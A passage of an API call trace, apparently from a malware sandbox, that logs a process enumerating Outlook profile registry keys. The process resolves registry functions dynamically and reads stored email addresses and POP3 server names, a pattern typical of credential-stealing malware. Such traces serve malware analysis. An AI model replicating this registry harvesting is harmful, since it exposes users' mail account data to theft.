out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.969] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.969] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.969] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.969] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d040 | out: hHeap=0x560000) returned 1 [0186.970] lstrlenA (lpString="\\") returned 1 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0186.970] lstrcpyA (in: lpString1=0x617150, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.970] GetProcessHeap () returned 0x560000 [0186.970] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616c90 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616c90, Size=0x71) returned 0x610840 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61d040 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.970] GetProcessHeap () returned 0x560000 [0186.970] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.970] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.973] GetProcessHeap () returned 0x560000 [0186.973] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.973] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.973] GetProcessHeap () returned 0x560000 [0186.973] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.973] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.973] GetProcessHeap () returned 0x560000 [0186.973] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.974] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.974] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.974] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d040 | out: hHeap=0x560000) returned 1 [0186.974] lstrlenA (lpString="\\") returned 1 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0186.974] lstrcpyA (in: lpString1=0x617250, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.974] GetProcessHeap () returned 0x560000 [0186.974] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61d940 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.974] GetProcessHeap () returned 0x560000 [0186.974] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.975] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.975] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.975] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.975] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171c0 [0186.975] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.975] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x560000) returned 1 [0186.975] lstrlenA (lpString="\\") returned 1 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0186.975] lstrcpyA (in: lpString1=0x617250, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.975] GetProcessHeap () returned 0x560000 [0186.975] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.975] GetProcessHeap () returned 0x560000 [0186.975] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61db80 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.976] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.976] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.976] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.976] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000001") returned 0x0 [0186.976] lstrlenA (lpString="00000001") returned 8 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617150 [0186.976] lstrcpyA (in: lpString1=0x617150, lpString2="00000001" | out: lpString1="00000001") returned="00000001" [0186.976] lstrlenA (lpString="\\") returned 1 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0186.976] lstrcpyA (in: lpString1=0x617180, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.976] GetProcessHeap () returned 0x560000 [0186.976] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x59) returned 0x6192f0 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6192f0, Size=0xb3) returned 0x61d280 [0186.976] GetProcessHeap () returned 0x560000 [0186.976] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5a) returned 0x6198f0 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6198f0, Size=0xc3) returned 0x610840 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d280 | out: hHeap=0x560000) returned 1 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617190 [0186.977] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.977] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x231f588 | out: phkResult=0x231f588*=0x214) returned 0x0 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617150 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171e0 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617160 [0186.977] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.977] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f500 | out: phkResult=0x231f500*=0x218) returned 0x0 [0186.977] GetProcessHeap () returned 0x560000 [0186.977] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615e40 [0186.978] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e40 | out: hHeap=0x560000) returned 1 [0186.978] RegQueryValueExA (in: hKey=0x218, lpValueName="Email", lpReserved=0x0, lpType=0x231f4f8, lpData=0x0, lpcbData=0x231f4f4*=0x0 | out: lpType=0x231f4f8*=0x0, lpData=0x0, lpcbData=0x231f4f4*=0x0) returned 0x2 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0186.978] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.978] RegCloseKey (hKey=0x218) returned 0x0 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.978] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.978] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x1, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000002") returned 0x0 [0186.978] lstrlenA (lpString="00000002") returned 8 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6171c0 [0186.978] lstrcpyA (in: lpString1=0x6171c0, lpString2="00000002" | out: lpString1="00000002") returned="00000002" [0186.978] lstrlenA (lpString="\\") returned 1 [0186.978] GetProcessHeap () returned 0x560000 [0186.978] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0186.978] lstrcpyA (in: lpString1=0x617150, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x59) returned 0x619950 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x619950, Size=0xb3) returned 0x61dc40 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5a) returned 0x6195f0 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6195f0, Size=0xc3) returned 0x610840 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61dc40 | out: hHeap=0x560000) returned 1 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171c0 [0186.979] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.979] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x231f588 | out: phkResult=0x231f588*=0x218) returned 0x0 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617150 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617180 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617160 [0186.979] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0186.979] GetProcessHeap () returned 0x560000 [0186.979] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.979] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f500 | out: phkResult=0x231f500*=0x21c) returned 0x0 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615f40 [0186.980] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x560000) returned 1 [0186.980] RegQueryValueExA (in: hKey=0x21c, lpValueName="Email", lpReserved=0x0, lpType=0x231f4f8, lpData=0x0, lpcbData=0x231f4f4*=0x0 | out: lpType=0x231f4f8*=0x1, lpData=0x0, lpcbData=0x231f4f4*=0xf) returned 0x0 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617160 [0186.980] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.980] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.980] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617150, Size=0x10) returned 0x6171c0 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615f60 [0186.980] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.980] GetProcessHeap () returned 0x560000 [0186.980] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x560000) returned 1 [0186.980] RegQueryValueExA (in: hKey=0x21c, lpValueName="Email", lpReserved=0x0, lpType=0x231f4f8, lpData=0x6171c0, lpcbData=0x231f4f4*=0xf | out: lpType=0x231f4f8*=0x1, lpData="achoo@gdllo.de", lpcbData=0x231f4f4*=0xf) returned 0x0 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.981] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.981] RegCloseKey (hKey=0x21c) returned 0x0 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x62) returned 0x610920 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617210 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617190 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617250 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617180 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617180, Size=0x17) returned 0x615da0 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617150 [0186.981] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.981] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f2b0 | out: phkResult=0x231f2b0*=0x21c) returned 0x0 [0186.981] GetProcessHeap () returned 0x560000 [0186.981] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615ea0 [0186.982] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0186.982] RegQueryValueExA (in: hKey=0x21c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x231f2a8, lpData=0x0, lpcbData=0x231f2a4*=0x0 | out: lpType=0x231f2a8*=0x1, lpData=0x0, lpcbData=0x231f2a4*=0xd) returned 0x0 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617160 [0186.982] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.982] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.982] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617190, Size=0xe) returned 0x617150 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615d60 [0186.982] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.982] GetProcessHeap () returned 0x560000 [0186.982] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x560000) returned 1 [0186.982] RegQueryValueExA (in: hKey=0x21c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x231f2a8, lpData=0x617150, lpcbData=0x231f2a4*=0xd | out: lpType=0x231f2a8*=0x1, lpData="pop.gdllo.de", lpcbData=0x231f2a4*=0xd) returned 0x0 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.983] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.983] RegCloseKey (hKey=0x21c) returned 0x0 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x560000) returned 1 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617160 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617250 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617160 [0186.983] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.983] lstrlenA (lpString="pop.gdllo.de") returned 12 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6171e0 [0186.983] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.983] GetProcessHeap () returned 0x560000 [0186.983] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.983] GetProcessHeap () returned 0x560000 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0186.984] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.984] 